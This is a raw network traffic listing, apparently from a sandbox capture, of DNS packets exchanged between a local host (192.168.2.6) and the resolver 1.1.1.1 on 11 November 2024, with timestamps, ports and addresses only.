                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.698302984 CET53616721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.698314905 CET53514791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.698888063 CET53556571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.698900938 CET53646851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.700169086 CET53586581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.700561047 CET53561051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.743690968 CET5019353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.757249117 CET53501931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.784373045 CET5754553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.786169052 CET5746253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.786426067 CET6463753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.790730000 CET5900653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.791868925 CET6329353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.791919947 CET5753853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.792515993 CET5161153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793056011 CET6250153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793256998 CET6161153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793782949 CET5423953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.794481993 CET5781853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795114994 CET5868853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795114994 CET4967453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795332909 CET5630153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795732975 CET5885353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796230078 CET5784053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796538115 CET5744153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796566010 CET53575451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797636986 CET53646371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797743082 CET5572453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797743082 CET6215053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.798877001 CET5665553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.801680088 CET53590061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.802298069 CET5136253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.802678108 CET53516111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.802767038 CET53563011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.803181887 CET53625011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.213505983 CET6005253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.217792988 CET53537301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.218482971 CET53586751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.218996048 CET53501751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.223346949 CET5833353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.224435091 CET53600521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.225126982 CET5356853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.226389885 CET53604971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.232094049 CET53583331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.237584114 CET53636421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.240511894 CET53604111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246642113 CET5240553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246670008 CET5776953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246995926 CET4982053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247319937 CET5032253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247374058 CET6501353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247469902 CET6145053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247606993 CET6184753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247734070 CET6541653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248193979 CET5444853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248210907 CET5354053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248308897 CET4963653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248399019 CET4957653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248588085 CET5504153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248800039 CET5855653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248989105 CET5204853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.251764059 CET6090753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.252176046 CET6259753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.252784967 CET5589153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.254148960 CET6467453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.254878998 CET6018853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.255513906 CET6357653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.256302118 CET6347753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.257287979 CET53585561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258016109 CET53654161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258124113 CET53535681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258737087 CET53498201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258749962 CET53650131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258958101 CET53524051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258981943 CET53550411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258991957 CET53544481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.259037018 CET53614501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.260401011 CET53503221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.260999918 CET53535401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.265405893 CET53635761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.265758038 CET53558911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.265769005 CET53646741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.265981913 CET53601881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.267133951 CET53609071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.267891884 CET5158153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.270812988 CET6120453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.278588057 CET53515811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.279575109 CET5782553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280002117 CET53577691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280165911 CET5614753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280550957 CET53612041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280564070 CET53618471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280623913 CET53495761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.282130957 CET53496361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.282147884 CET53520481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.284600019 CET53625971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.285737038 CET6382653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.286643028 CET53634771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.286855936 CET5840253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.289969921 CET53561471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.298587084 CET53584021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303428888 CET6433553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303714037 CET6486453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303916931 CET6452553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.305082083 CET6384653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.305301905 CET5238853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.311283112 CET53578251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.313921928 CET53643351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.314414978 CET53638461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.315093994 CET53645251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.318829060 CET53638261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.335661888 CET53523881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.335875034 CET53648641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.346206903 CET6228653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.351659060 CET5108753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.355880022 CET53622861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.356245041 CET5741653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.356313944 CET6022753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.363262892 CET5741853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.363905907 CET53574161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.365959883 CET5058653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.366373062 CET5047953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.366769075 CET53602271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.383600950 CET53510871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.384227991 CET53505861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.389991045 CET6291553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.395282030 CET53574181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.396962881 CET53504791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.407825947 CET53629151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.457942963 CET6207253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.460469961 CET5379153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.465318918 CET6128053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.466861963 CET5237953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.469060898 CET6449853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.470403910 CET5654853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.471019030 CET53537911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.471631050 CET5155453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.472618103 CET6135653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.443675995 CET53574871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.444561958 CET53496801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.444983006 CET53574541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.446749926 CET53553841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.448077917 CET53500861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.449141979 CET6271253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.451913118 CET5450453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.454118013 CET53535711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.456053019 CET6016453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.456732988 CET6160353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458127975 CET6295953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458564997 CET5385353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458807945 CET53627121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.460107088 CET5039053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.460827112 CET6463353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.462630987 CET53545041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.466062069 CET53601641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.466531992 CET53616031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.469893932 CET6497553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.469975948 CET53538531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.470179081 CET53503901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.470716000 CET5922853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.471797943 CET5076553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.471995115 CET5697753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.472156048 CET5107353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.472409964 CET5657053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.475270033 CET53629591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.476733923 CET5898853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477016926 CET5627853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477226019 CET5494553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477245092 CET5119553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477442980 CET5564153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477581978 CET6115853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477641106 CET4992553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477782965 CET5375553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477953911 CET5618953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.478113890 CET5474953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.478399992 CET6438853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.481293917 CET53592281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.481616020 CET53507651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.481803894 CET53510731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.482194901 CET53565701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.485016108 CET53611581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.486852884 CET53556411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.486963034 CET53499251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.487257004 CET53561891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.487473965 CET53537551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.487483978 CET53643881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.487880945 CET53589881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.489917994 CET53569771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.490645885 CET53646331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495208979 CET53511951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495336056 CET5643153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495898962 CET5040253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496181965 CET4938553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496411085 CET6417153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496603966 CET5284853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496630907 CET5700253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496788979 CET6521453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496970892 CET5236153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497080088 CET6185453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497157097 CET5536653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497245073 CET5187953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497384071 CET5061753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497607946 CET6279253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497771025 CET5428753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497936964 CET5883353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.498084068 CET5502753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.498217106 CET5296253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.500942945 CET53649751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501128912 CET5472053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501174927 CET6407153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501405954 CET5674253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501431942 CET6120753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501810074 CET5791453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.502006054 CET6324653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.502130985 CET5495353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.505413055 CET53652141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.506383896 CET53493851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507105112 CET53523611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507116079 CET53528481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507128000 CET53618541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507234097 CET53518791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507277966 CET53641711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507436991 CET53562781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507448912 CET53506171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.507563114 CET53549451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.508382082 CET53529621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.508980036 CET53627921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.509195089 CET53612071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.509529114 CET53547491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.509587049 CET5047853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.510622025 CET6107653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.510687113 CET6261653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.511758089 CET53549531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.511770010 CET53640711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.512567997 CET53579141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.518148899 CET5754253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.519071102 CET53504781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.521226883 CET53626161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.525950909 CET53504021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.527004004 CET53570021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.527254105 CET53575421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.051964045 CET53639681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.054430008 CET53543341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.146271944 CET5048053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.153625965 CET53504801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.160948038 CET6336853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.161462069 CET5181053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.171379089 CET53518101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.173532963 CET6381053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.174246073 CET5602253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.180671930 CET6104653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.182830095 CET5777253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.183003902 CET53638101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.183408976 CET6494753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.184115887 CET53560221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.185587883 CET5025953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.186707973 CET5729253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.188913107 CET6513653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.189598083 CET6098953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.192398071 CET53633681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.192459106 CET6346253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.192946911 CET6358653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.195041895 CET5711753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.195357084 CET53502591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.198992968 CET53649471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.199491978 CET53651361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.200701952 CET53577721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.201381922 CET53609891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.203964949 CET5738553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.204307079 CET53634621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.204739094 CET53571171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.204746962 CET5653953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.207344055 CET5982153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.212378979 CET53610461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.217550039 CET53572921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.217583895 CET53598211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.223690033 CET53635861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.232023001 CET5269553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.232357979 CET5599853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.232690096 CET6495253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.235057116 CET53565391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.236362934 CET5612753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.237519026 CET5724053192.168.2.61.1.1.1
